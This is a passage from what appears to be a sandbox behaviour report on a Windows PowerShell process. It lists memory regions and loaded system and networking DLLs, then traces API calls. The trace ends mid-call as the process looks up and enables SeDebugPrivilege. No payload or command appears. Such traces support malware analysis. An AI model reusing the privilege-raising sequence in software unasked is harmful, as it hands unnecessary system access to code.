"\\Windows\\assembly\\NativeImages_v2.0.50727_64\\Microsoft.PowerShel#\\b5a6a5ce3cd3d4dd2b151315c612aeff\\Microsoft.PowerShell.Security.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_64\\microsoft.powershel#\\b5a6a5ce3cd3d4dd2b151315c612aeff\\microsoft.powershell.security.ni.dll") Region: id = 813 start_va = 0x2840000 end_va = 0x2893fff entry_point = 0x2840000 region_type = mapped_file name = "mscorrc.dll" filename = 
"\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorrc.dll" (normalized: "c:\\windows\\microsoft.net\\framework64\\v2.0.50727\\mscorrc.dll") Region: id = 814 start_va = 0x7fee5610000 end_va = 0x7fee57a4fff entry_point = 0x7fee5610000 region_type = mapped_file name = "system.directoryservices.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_64\\System.DirectorySer#\\c1cdea55f62c9e8b9b9c1ae4c23b1c1f\\System.DirectoryServices.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_64\\system.directoryser#\\c1cdea55f62c9e8b9b9c1ae4c23b1c1f\\system.directoryservices.ni.dll") Region: id = 815 start_va = 0x7fee57b0000 end_va = 0x7fee591bfff entry_point = 0x7fee57b0000 region_type = mapped_file name = "system.management.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_64\\System.Management\\c44929bde355680c886f8a52f5e22b81\\System.Management.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_64\\system.management\\c44929bde355680c886f8a52f5e22b81\\system.management.ni.dll") Region: id = 816 start_va = 0x7fee5920000 end_va = 0x7fee5fc4fff entry_point = 0x7fee5920000 region_type = mapped_file name = "system.xml.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_64\\System.Xml\\ee795155543768ea67eecddc686a1e9e\\System.Xml.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_64\\system.xml\\ee795155543768ea67eecddc686a1e9e\\system.xml.ni.dll") Region: id = 817 start_va = 0x7fee9e20000 end_va = 0x7fee9e26fff entry_point = 0x7fee9e20000 region_type = mapped_file name = "shfolder.dll" filename = "\\Windows\\System32\\shfolder.dll" (normalized: "c:\\windows\\system32\\shfolder.dll") Region: id = 818 start_va = 0x28a0000 end_va = 0x28b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000028a0000" filename = "" Region: id = 819 start_va = 0x28c0000 end_va = 0x28c0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000028c0000" filename 
= "" Region: id = 820 start_va = 0x7fee5480000 end_va = 0x7fee5603fff entry_point = 0x7fee5480000 region_type = mapped_file name = "mscorjit.dll" filename = "\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorjit.dll" (normalized: "c:\\windows\\microsoft.net\\framework64\\v2.0.50727\\mscorjit.dll") Region: id = 821 start_va = 0x7ff00180000 end_va = 0x7ff0018ffff entry_point = 0x0 region_type = private name = "private_0x000007ff00180000" filename = "" Region: id = 822 start_va = 0x7ff00190000 end_va = 0x7ff0019ffff entry_point = 0x0 region_type = private name = "private_0x000007ff00190000" filename = "" Region: id = 823 start_va = 0x7ff001a0000 end_va = 0x7ff001affff entry_point = 0x0 region_type = private name = "private_0x000007ff001a0000" filename = "" Region: id = 824 start_va = 0x7ff001b0000 end_va = 0x7ff001bffff entry_point = 0x0 region_type = private name = "private_0x000007ff001b0000" filename = "" Region: id = 825 start_va = 0x7ff001c0000 end_va = 0x7ff001cffff entry_point = 0x0 region_type = private name = "private_0x000007ff001c0000" filename = "" Region: id = 826 start_va = 0x7ff001d0000 end_va = 0x7ff001dffff entry_point = 0x0 region_type = private name = "private_0x000007ff001d0000" filename = "" Region: id = 827 start_va = 0x7ff001e0000 end_va = 0x7ff001effff entry_point = 0x0 region_type = private name = "private_0x000007ff001e0000" filename = "" Region: id = 828 start_va = 0x7fefd930000 end_va = 0x7fefd93afff entry_point = 0x7fefd930000 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\System32\\secur32.dll" (normalized: "c:\\windows\\system32\\secur32.dll") Region: id = 829 start_va = 0x7ff001f0000 end_va = 0x7ff001fffff entry_point = 0x0 region_type = private name = "private_0x000007ff001f0000" filename = "" Region: id = 830 start_va = 0x7ff00200000 end_va = 0x7ff0020ffff entry_point = 0x0 region_type = private name = "private_0x000007ff00200000" filename = "" Region: id = 831 start_va = 0x7ff00210000 end_va = 
0x7ff0021ffff entry_point = 0x0 region_type = private name = "private_0x000007ff00210000" filename = "" Region: id = 832 start_va = 0x7fefd960000 end_va = 0x7fefd984fff entry_point = 0x7fefd960000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 833 start_va = 0x1b900000 end_va = 0x1b9fffff entry_point = 0x0 region_type = private name = "private_0x000000001b900000" filename = "" Region: id = 834 start_va = 0x2a50000 end_va = 0x2a50fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002a50000" filename = "" Region: id = 835 start_va = 0x1ba00000 end_va = 0x1bcfefff entry_point = 0x1ba00000 region_type = mapped_file name = "system.data.dll" filename = "\\Windows\\assembly\\GAC_64\\System.Data\\2.0.0.0__b77a5c561934e089\\System.Data.dll" (normalized: "c:\\windows\\assembly\\gac_64\\system.data\\2.0.0.0__b77a5c561934e089\\system.data.dll") Region: id = 836 start_va = 0x7fee4c30000 end_va = 0x7fee547afff entry_point = 0x7fee4c30000 region_type = mapped_file name = "system.data.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_64\\System.Data\\accc3a5269658c8c47fe3e402ac4ac1c\\System.Data.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_64\\system.data\\accc3a5269658c8c47fe3e402ac4ac1c\\system.data.ni.dll") Region: id = 837 start_va = 0x7fefdb40000 end_va = 0x7fefdb4efff entry_point = 0x7fefdb40000 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll") Region: id = 838 start_va = 0x7fefdb70000 end_va = 0x7fefdcd6fff entry_point = 0x7fefdb70000 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll") Region: id = 839 start_va = 0x7fefe0a0000 end_va = 0x7fefe0a7fff entry_point = 0x7fefe0a0000 region_type = mapped_file name = "nsi.dll" 
filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 840 start_va = 0x7feff950000 end_va = 0x7feff99cfff entry_point = 0x7feff950000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 841 start_va = 0x7ff00220000 end_va = 0x7ff0022ffff entry_point = 0x0 region_type = private name = "private_0x000007ff00220000" filename = "" Region: id = 842 start_va = 0x7ff00230000 end_va = 0x7ff0023ffff entry_point = 0x0 region_type = private name = "private_0x000007ff00230000" filename = "" Region: id = 843 start_va = 0x2a60000 end_va = 0x2a6ffff entry_point = 0x0 region_type = private name = "private_0x0000000002a60000" filename = "" Region: id = 844 start_va = 0x2a70000 end_va = 0x2a7ffff entry_point = 0x0 region_type = private name = "private_0x0000000002a70000" filename = "" Region: id = 845 start_va = 0x2a90000 end_va = 0x2a9ffff entry_point = 0x0 region_type = private name = "private_0x0000000002a90000" filename = "" Region: id = 846 start_va = 0x2aa0000 end_va = 0x2aaffff entry_point = 0x0 region_type = private name = "private_0x0000000002aa0000" filename = "" Region: id = 847 start_va = 0x7ff00240000 end_va = 0x7ff0024ffff entry_point = 0x0 region_type = private name = "private_0x000007ff00240000" filename = "" Region: id = 848 start_va = 0x7ff00250000 end_va = 0x7ff0025ffff entry_point = 0x0 region_type = private name = "private_0x000007ff00250000" filename = "" Region: id = 849 start_va = 0x7ff00260000 end_va = 0x7ff0026ffff entry_point = 0x0 region_type = private name = "private_0x000007ff00260000" filename = "" Region: id = 850 start_va = 0x1be00000 end_va = 0x1c78ffff entry_point = 0x0 region_type = private name = "private_0x000000001be00000" filename = "" Region: id = 851 start_va = 0x7fefda80000 end_va = 0x7fefda93fff entry_point = 0x7fefda80000 region_type = mapped_file name = "rpcrtremote.dll" filename = 
"\\Windows\\System32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll") Region: id = 852 start_va = 0x7ff00270000 end_va = 0x7ff0027ffff entry_point = 0x0 region_type = private name = "private_0x000007ff00270000" filename = "" Region: id = 853 start_va = 0x7fffff0e000 end_va = 0x7fffff0ffff entry_point = 0x0 region_type = private name = "private_0x000007fffff0e000" filename = "" Region: id = 854 start_va = 0x1bd00000 end_va = 0x1bd7ffff entry_point = 0x0 region_type = private name = "private_0x000000001bd00000" filename = "" Region: id = 855 start_va = 0x7fffff0c000 end_va = 0x7fffff0dfff entry_point = 0x0 region_type = private name = "private_0x000007fffff0c000" filename = "" Region: id = 856 start_va = 0x1c920000 end_va = 0x1c99ffff entry_point = 0x0 region_type = private name = "private_0x000000001c920000" filename = "" Region: id = 857 start_va = 0x7fee4ae0000 end_va = 0x7fee4c22fff entry_point = 0x7fee4ae0000 region_type = mapped_file name = "system.configuration.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_64\\System.Configuration\\091b931d0f6408001747dbbbb05dbe66\\System.Configuration.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_64\\system.configuration\\091b931d0f6408001747dbbbb05dbe66\\system.configuration.ni.dll") Region: id = 858 start_va = 0x7fffff0a000 end_va = 0x7fffff0bfff entry_point = 0x0 region_type = private name = "private_0x000007fffff0a000" filename = "" Region: id = 859 start_va = 0x7fef6090000 end_va = 0x7fef60f1fff entry_point = 0x7fef6090000 region_type = mapped_file name = "rasapi32.dll" filename = "\\Windows\\System32\\rasapi32.dll" (normalized: "c:\\windows\\system32\\rasapi32.dll") Region: id = 860 start_va = 0x7fef99a0000 end_va = 0x7fef99bbfff entry_point = 0x7fef99a0000 region_type = mapped_file name = "rasman.dll" filename = "\\Windows\\System32\\rasman.dll" (normalized: "c:\\windows\\system32\\rasman.dll") Region: id = 861 start_va = 0x7fefb5a0000 end_va = 
0x7fefb5b0fff entry_point = 0x7fefb5a0000 region_type = mapped_file name = "rtutils.dll" filename = "\\Windows\\System32\\rtutils.dll" (normalized: "c:\\windows\\system32\\rtutils.dll") Region: id = 862 start_va = 0x7fefd330000 end_va = 0x7fefd384fff entry_point = 0x7fefd330000 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\System32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll") Region: id = 863 start_va = 0x1c9a0000 end_va = 0x1cbfffff entry_point = 0x0 region_type = private name = "private_0x000000001c9a0000" filename = "" Region: id = 864 start_va = 0x7fefcd30000 end_va = 0x7fefcd36fff entry_point = 0x7fefcd30000 region_type = mapped_file name = "wshtcpip.dll" filename = "\\Windows\\System32\\WSHTCPIP.DLL" (normalized: "c:\\windows\\system32\\wshtcpip.dll") Region: id = 865 start_va = 0x7fefd320000 end_va = 0x7fefd326fff entry_point = 0x7fefd320000 region_type = mapped_file name = "wship6.dll" filename = "\\Windows\\System32\\wship6.dll" (normalized: "c:\\windows\\system32\\wship6.dll") Region: id = 866 start_va = 0x2ab0000 end_va = 0x2acffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002ab0000" filename = "" Region: id = 867 start_va = 0x1c7a0000 end_va = 0x1c81ffff entry_point = 0x0 region_type = private name = "private_0x000000001c7a0000" filename = "" Region: id = 868 start_va = 0x7fefaba0000 end_va = 0x7fefac03fff entry_point = 0x7fefaba0000 region_type = mapped_file name = "webio.dll" filename = "\\Windows\\System32\\webio.dll" (normalized: "c:\\windows\\system32\\webio.dll") Region: id = 869 start_va = 0x7fefac10000 end_va = 0x7fefac80fff entry_point = 0x7fefac10000 region_type = mapped_file name = "winhttp.dll" filename = "\\Windows\\System32\\winhttp.dll" (normalized: "c:\\windows\\system32\\winhttp.dll") Region: id = 870 start_va = 0x7fffff08000 end_va = 0x7fffff09fff entry_point = 0x0 region_type = private name = "private_0x000007fffff08000" filename = "" Region: id = 871 start_va 
= 0x7fefb550000 end_va = 0x7fefb576fff entry_point = 0x7fefb550000 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll") Region: id = 872 start_va = 0x7fefb540000 end_va = 0x7fefb54afff entry_point = 0x7fefb540000 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll") Region: id = 873 start_va = 0x7fefb3c0000 end_va = 0x7fefb3d0fff entry_point = 0x7fefb3c0000 region_type = mapped_file name = "dhcpcsvc6.dll" filename = "\\Windows\\System32\\dhcpcsvc6.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc6.dll") Region: id = 874 start_va = 0x7fefb3a0000 end_va = 0x7fefb3b7fff entry_point = 0x7fefb3a0000 region_type = mapped_file name = "dhcpcsvc.dll" filename = "\\Windows\\System32\\dhcpcsvc.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc.dll") Region: id = 875 start_va = 0x7fefcf90000 end_va = 0x7fefcf99fff entry_point = 0x7fefcf90000 region_type = mapped_file name = "credssp.dll" filename = "\\Windows\\System32\\credssp.dll" (normalized: "c:\\windows\\system32\\credssp.dll") Region: id = 876 start_va = 0x1ca40000 end_va = 0x1cabffff entry_point = 0x0 region_type = private name = "private_0x000000001ca40000" filename = "" Region: id = 877 start_va = 0x1cb80000 end_va = 0x1cbfffff entry_point = 0x0 region_type = private name = "private_0x000000001cb80000" filename = "" Region: id = 878 start_va = 0x7fefd1b0000 end_va = 0x7fefd20afff entry_point = 0x7fefd1b0000 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll") Region: id = 879 start_va = 0x7fffff06000 end_va = 0x7fffff07fff entry_point = 0x0 region_type = private name = "private_0x000007fffff06000" filename = "" Region: id = 880 start_va = 0x1cc00000 end_va = 0x1cd6ffff entry_point = 0x0 region_type = private name = "private_0x000000001cc00000" filename 
= "" Region: id = 881 start_va = 0x7fefab90000 end_va = 0x7fefab97fff entry_point = 0x7fefab90000 region_type = mapped_file name = "rasadhlp.dll" filename = "\\Windows\\System32\\rasadhlp.dll" (normalized: "c:\\windows\\system32\\rasadhlp.dll") Region: id = 882 start_va = 0x7fefb3f0000 end_va = 0x7fefb442fff entry_point = 0x7fefb3f0000 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 883 start_va = 0x1cd70000 end_va = 0x1cfaffff entry_point = 0x0 region_type = private name = "private_0x000000001cd70000" filename = "" Region: id = 884 start_va = 0x2ad0000 end_va = 0x2adffff entry_point = 0x0 region_type = private name = "private_0x0000000002ad0000" filename = "" Region: id = 885 start_va = 0x7ff00280000 end_va = 0x7ff0028ffff entry_point = 0x0 region_type = private name = "private_0x000007ff00280000" filename = "" Region: id = 886 start_va = 0x2ae0000 end_va = 0x2ae3fff entry_point = 0x2ae0000 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 887 start_va = 0x7feff770000 end_va = 0x7feff8e7fff entry_point = 0x7feff770000 region_type = mapped_file name = "urlmon.dll" filename = "\\Windows\\System32\\urlmon.dll" (normalized: "c:\\windows\\system32\\urlmon.dll") Region: id = 888 start_va = 0x7fefe0b0000 end_va = 0x7fefe1d9fff entry_point = 0x7fefe0b0000 region_type = mapped_file name = "wininet.dll" filename = "\\Windows\\System32\\wininet.dll" (normalized: "c:\\windows\\system32\\wininet.dll") Region: id = 889 start_va = 0x7feff490000 end_va = 0x7feff6e8fff entry_point = 0x7feff490000 region_type = mapped_file name = "iertutil.dll" filename = "\\Windows\\System32\\iertutil.dll" (normalized: "c:\\windows\\system32\\iertutil.dll") Region: id = 890 start_va = 0x2af0000 end_va = 0x2af0fff entry_point = 0x0 
region_type = pagefile_backed name = "pagefile_0x0000000002af0000" filename = "" Thread: id = 43 os_tid = 0xbfc [0129.119] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0129.611] SysStringByteLen (bstr="Microsoft.PowerShell.ConsoleHost, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, ProcessorArchitecture=msil") returned 0xfe [0129.612] SysStringByteLen (bstr="Microsoft.PowerShell.ConsoleHost, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, ProcessorArchitecture=msil") returned 0xfe [0129.612] SysStringByteLen (bstr="Microsoft.PowerShell.UnmanagedPSEntry") returned 0x4a [0129.612] SysStringByteLen (bstr="Microsoft.PowerShell.UnmanagedPSEntry") returned 0x4a [0130.649] GetVersionExW (in: lpVersionInformation=0xcdbc0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0xcdbc0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0130.651] GetVersionExW (in: lpVersionInformation=0xcdbc0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0xcdbc0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0130.659] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcd7e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0130.666] GetFullPathNameW (in: 
lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcd880, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0130.666] GetVersionExW (in: lpVersionInformation=0xcd930*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0xcd930*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0130.666] SetErrorMode (uMode=0x1) returned 0x1 [0130.667] GetFileAttributesExW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll"), fInfoLevelId=0x0, lpFileInformation=0xcda90 | out: lpFileInformation=0xcda90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa85ac0a8, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa85ac0a8, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa85d2208, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x2df000)) returned 1 [0130.668] SetErrorMode (uMode=0x1) returned 0x1 [0130.681] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpdwHandle=0xcdd00 | out: lpdwHandle=0xcdd00) returned 0x94c [0130.684] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", dwHandle=0x0, dwLen=0x94c, 
lpData=0x2bc7108 | out: lpData=0x2bc7108) returned 1 [0130.687] VerQueryValueW (in: pBlock=0x2bc7108, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0xcdc78, puLen=0xcdc70 | out: lplpBuffer=0xcdc78*=0x2bc71a4, puLen=0xcdc70) returned 1 [0130.689] lstrlenW (lpString="䅁") returned 1 [0130.715] VerQueryValueW (in: pBlock=0x2bc7108, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\CompanyName", lplpBuffer=0xcdbe8, puLen=0xcdbe0 | out: lplpBuffer=0xcdbe8*=0x2bc7280, puLen=0xcdbe0) returned 1 [0130.715] lstrlenW (lpString="Microsoft Corporation") returned 21 [0130.717] CoTaskMemAlloc (cb=0x2e) returned 0x1a4400 [0130.717] lstrcpyW (in: lpString1=0x1a4400, lpString2="Microsoft Corporation" | out: lpString1="Microsoft Corporation") returned="Microsoft Corporation" [0130.718] CoTaskMemFree (pv=0x1a4400) [0130.719] VerQueryValueW (in: pBlock=0x2bc7108, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileDescription", lplpBuffer=0xcdbe8, puLen=0xcdbe0 | out: lplpBuffer=0xcdbe8*=0x2bc72d4, puLen=0xcdbe0) returned 1 [0130.719] lstrlenW (lpString="System.Management.Automation") returned 28 [0130.719] CoTaskMemAlloc (cb=0x3c) returned 0x165e40 [0130.719] lstrcpyW (in: lpString1=0x165e40, lpString2="System.Management.Automation" | out: lpString1="System.Management.Automation") returned="System.Management.Automation" [0130.719] CoTaskMemFree (pv=0x165e40) [0130.719] VerQueryValueW (in: pBlock=0x2bc7108, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileVersion", lplpBuffer=0xcdbe8, puLen=0xcdbe0 | out: lplpBuffer=0xcdbe8*=0x2bc7330, puLen=0xcdbe0) returned 1 [0130.719] lstrlenW (lpString="6.1.7601.17514") returned 14 [0130.719] CoTaskMemAlloc (cb=0x20) returned 0x1a2bd0 [0130.719] lstrcpyW (in: lpString1=0x1a2bd0, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514" [0130.719] CoTaskMemFree (pv=0x1a2bd0) [0130.719] VerQueryValueW (in: pBlock=0x2bc7108, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\InternalName", lplpBuffer=0xcdbe8, puLen=0xcdbe0 | 
out: lplpBuffer=0xcdbe8*=0x2bc7370, puLen=0xcdbe0) returned 1 [0130.719] lstrlenW (lpString="System.Management.Automation.dll") returned 32 [0130.719] CoTaskMemAlloc (cb=0x44) returned 0x165e40 [0130.719] lstrcpyW (in: lpString1=0x165e40, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll" [0130.719] CoTaskMemFree (pv=0x165e40) [0130.719] VerQueryValueW (in: pBlock=0x2bc7108, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalCopyright", lplpBuffer=0xcdbe8, puLen=0xcdbe0 | out: lplpBuffer=0xcdbe8*=0x2bc73d8, puLen=0xcdbe0) returned 1 [0130.719] lstrlenW (lpString="Copyright (c) Microsoft Corporation. All rights reserved.") returned 57 [0130.719] CoTaskMemAlloc (cb=0x76) returned 0x147840 [0130.719] lstrcpyW (in: lpString1=0x147840, lpString2="Copyright (c) Microsoft Corporation. All rights reserved." | out: lpString1="Copyright (c) Microsoft Corporation. All rights reserved.") returned="Copyright (c) Microsoft Corporation. All rights reserved." 
[0130.719] CoTaskMemFree (pv=0x147840) [0130.719] VerQueryValueW (in: pBlock=0x2bc7108, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\OriginalFilename", lplpBuffer=0xcdbe8, puLen=0xcdbe0 | out: lplpBuffer=0xcdbe8*=0x2bc7474, puLen=0xcdbe0) returned 1 [0130.719] lstrlenW (lpString="System.Management.Automation.dll") returned 32 [0130.719] CoTaskMemAlloc (cb=0x44) returned 0x165e40 [0130.719] lstrcpyW (in: lpString1=0x165e40, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll" [0130.719] CoTaskMemFree (pv=0x165e40) [0130.719] VerQueryValueW (in: pBlock=0x2bc7108, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductName", lplpBuffer=0xcdbe8, puLen=0xcdbe0 | out: lplpBuffer=0xcdbe8*=0x2bc74d8, puLen=0xcdbe0) returned 1 [0130.719] lstrlenW (lpString="Microsoft (R) Windows (R) Operating System") returned 42 [0130.719] CoTaskMemAlloc (cb=0x58) returned 0x10bb70 [0130.719] lstrcpyW (in: lpString1=0x10bb70, lpString2="Microsoft (R) Windows (R) Operating System" | out: lpString1="Microsoft (R) Windows (R) Operating System") returned="Microsoft (R) Windows (R) Operating System" [0130.719] CoTaskMemFree (pv=0x10bb70) [0130.719] VerQueryValueW (in: pBlock=0x2bc7108, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductVersion", lplpBuffer=0xcdbe8, puLen=0xcdbe0 | out: lplpBuffer=0xcdbe8*=0x2bc7554, puLen=0xcdbe0) returned 1 [0130.719] lstrlenW (lpString="6.1.7601.17514") returned 14 [0130.719] CoTaskMemAlloc (cb=0x20) returned 0x1a2bd0 [0130.720] lstrcpyW (in: lpString1=0x1a2bd0, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514" [0130.720] CoTaskMemFree (pv=0x1a2bd0) [0130.720] VerQueryValueW (in: pBlock=0x2bc7108, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\Comments", lplpBuffer=0xcdbe8, puLen=0xcdbe0 | out: lplpBuffer=0xcdbe8*=0x2bc71fc, puLen=0xcdbe0) returned 1 [0130.720] lstrlenW (lpString="Microsoft Windows PowerShell Engine Core Assembly") 
returned 49 [0130.720] CoTaskMemAlloc (cb=0x66) returned 0x19b6b0 [0130.720] lstrcpyW (in: lpString1=0x19b6b0, lpString2="Microsoft Windows PowerShell Engine Core Assembly" | out: lpString1="Microsoft Windows PowerShell Engine Core Assembly") returned="Microsoft Windows PowerShell Engine Core Assembly" [0130.720] CoTaskMemFree (pv=0x19b6b0) [0130.720] VerQueryValueW (in: pBlock=0x2bc7108, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalTrademarks", lplpBuffer=0xcdbe8, puLen=0xcdbe0 | out: lplpBuffer=0xcdbe8*=0x0, puLen=0xcdbe0) returned 0 [0130.720] VerQueryValueW (in: pBlock=0x2bc7108, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\PrivateBuild", lplpBuffer=0xcdbe8, puLen=0xcdbe0 | out: lplpBuffer=0xcdbe8*=0x0, puLen=0xcdbe0) returned 0 [0130.720] VerQueryValueW (in: pBlock=0x2bc7108, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\SpecialBuild", lplpBuffer=0xcdbe8, puLen=0xcdbe0 | out: lplpBuffer=0xcdbe8*=0x0, puLen=0xcdbe0) returned 0 [0130.720] VerQueryValueW (in: pBlock=0x2bc7108, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0xcdbb8, puLen=0xcdbb0 | out: lplpBuffer=0xcdbb8*=0x2bc71a4, puLen=0xcdbb0) returned 1 [0130.722] CoTaskMemAlloc (cb=0x204) returned 0x14d390 [0130.722] VerLanguageNameW (in: wLang=0x0, szLang=0x14d390, cchLang=0x100 | out: szLang="Language Neutral") returned 0x10 [0130.725] CoTaskMemFree (pv=0x14d390) [0130.725] VerQueryValueW (in: pBlock=0x2bc7108, lpSubBlock="\\", lplpBuffer=0xcdc08, puLen=0xcdc00 | out: lplpBuffer=0xcdc08*=0x2bc7130, puLen=0xcdc00) returned 1 [0130.752] GetCurrentProcessId () returned 0xbf8 [0130.783] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeDebugPrivilege", lpLuid=0xccb30 | out: lpLuid=0xccb30*(LowPart=0x14, HighPart=0)) returned 1 [0130.786] GetCurrentProcess () returned 0xffffffffffffffff [0130.787] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x20, TokenHandle=0xccb50 | out: TokenHandle=0xccb50*=0x2ec) returned 1 [0130.789] AdjustTokenPrivileges (in: TokenHandle=0x2ec, 
